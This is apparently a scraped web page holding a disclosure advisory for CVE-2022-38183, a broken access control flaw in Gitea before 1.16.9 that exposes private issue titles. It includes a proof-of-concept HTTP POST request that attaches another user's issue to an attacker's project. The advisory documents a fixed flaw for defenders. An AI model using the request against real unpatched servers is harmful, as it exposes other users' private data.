[et_pb_section fb_built=\"1\" _builder_version=\"4.16\" _module_preset=\"default\" background_color=\"#2E353D\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.16\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.16\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.25.1\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"]<\/p>\n
Advisory ID<\/strong>: usd-2022-0015 Gitea is an open source project allowing users to host software development version control using Git. It was possible for users to add existing issues to projects. Due to improper access controls, attackers could assign any issue to any project in Gitea. As a result, attackers would get access to private issue titles.<\/p>\n The issue with ID 7<\/strong> in the example below is an issue from a private repository of another user. The attacker can see the issue (without body text).<\/p>\n It is recommended to restrict access to sensitive functions or information by default. This security vulnerability was identified by Christian P\u00f6schl of usd AG.<\/p>\n [\/et_pb_text][\/et_pb_column][\/et_pb_row][\/et_pb_section]<\/p>\n","protected":false},"excerpt":{"rendered":" usd-2022-0015 | Broken Access Control in Gitea Project Issues Advisory ID: usd-2022-0015Product: GiteaAffected Version: < 1.16.9Vulnerability Type: CWE-284: Improper Access ControlSecurity Risk: MediumVendor URL: https:\/\/gitea.io\/Vendor Status: FixedAdvisory Status: ClosedCVE number: CVE-2022-38183CVE Link: https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2022-38183 Description Gitea is an open source project allowing users to host software development version control using Git. It was possible for users […]<\/p>\n","protected":false},"author":109,"featured_media":0,"parent":16124,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_et_pb_use_builder":"on","_et_pb_old_content":"","_et_gb_content_width":"","inline_featured_image":false,"footnotes":""},"class_list":["post-18717","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/18717","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/users\/109"}],"replies":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/comments?post=18717"}],"version-history":[{"count":5,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/18717\/revisions"}],"predecessor-version":[{"id":23118,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/18717\/revisions\/23118"}],"up":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/16124"}],"wp:attachment":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/media?parent=18717"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
Product<\/strong>: Gitea
Affected Version<\/strong>: < 1.16.9
Vulnerability Type<\/strong>: CWE-284: Improper Access Control<\/a>
Security Risk<\/strong>: Medium
Vendor URL<\/strong>: https:\/\/gitea.io\/<\/a>
Vendor Status<\/strong>: Fixed
Advisory Status<\/strong>: Closed
CVE number<\/strong>: CVE-2022-38183
CVE Link<\/strong>: https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2022-38183<\/a><\/p>\nDescription<\/h3>\n
Proof of Concept<\/h3>\n
The project with ID 3<\/strong> is the attackers project.<\/p>\n<\/span>POST<\/span> \/testuser\/test222\/issues\/projects<\/span> HTTP<\/span>\/<\/span>1.1
<\/span>Host<\/span>:<\/span> localhost:3000
<\/span>Content-Length<\/span>:<\/span> 85
<\/span>sec-ch-ua<\/span>:<\/span> \"Chromium\";v=\"97\", \" Not;A Brand\";v=\"99\"
<\/span>Accept<\/span>:<\/span> *\/*
<\/span>Content-Type<\/span>:<\/span> application\/x-www-form-urlencoded; charset=UTF-8
<\/span>X-Requested-With<\/span>:<\/span> XMLHttpRequest
<\/span>sec-ch-ua-mobile<\/span>:<\/span> ?0
<\/span>User-Agent<\/span>:<\/span> Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/97.0.4692.99 Safari\/537.36
<\/span>sec-ch-ua-platform<\/span>:<\/span> \"Linux\"
<\/span>Origin<\/span>:<\/span> http:\/\/localhost:3000<\/a>
<\/span>Accept-Encoding<\/span>:<\/span> gzip, deflate
<\/span>Accept-Language<\/span>:<\/span> en-US,en;q=0.9
<\/span>Cookie<\/span>:<\/span> XXX
<\/span>Connection<\/span>:<\/span> close<\/span>_csrf=tvK_ourfR_QjoYg7ZTI2i6NFAQM6MTY1NTc0OTYwMTExNjc3MzMwMA&action=&issue_ids=7&id=3<\/pre>\n<\/div>\nFix<\/h3>\n
Required access privileges should be granted explicitly by a global access control mechanism.<\/p>\nReferences<\/h3>\n
\n
Timeline<\/h3>\n
\n
Credits<\/h3>\n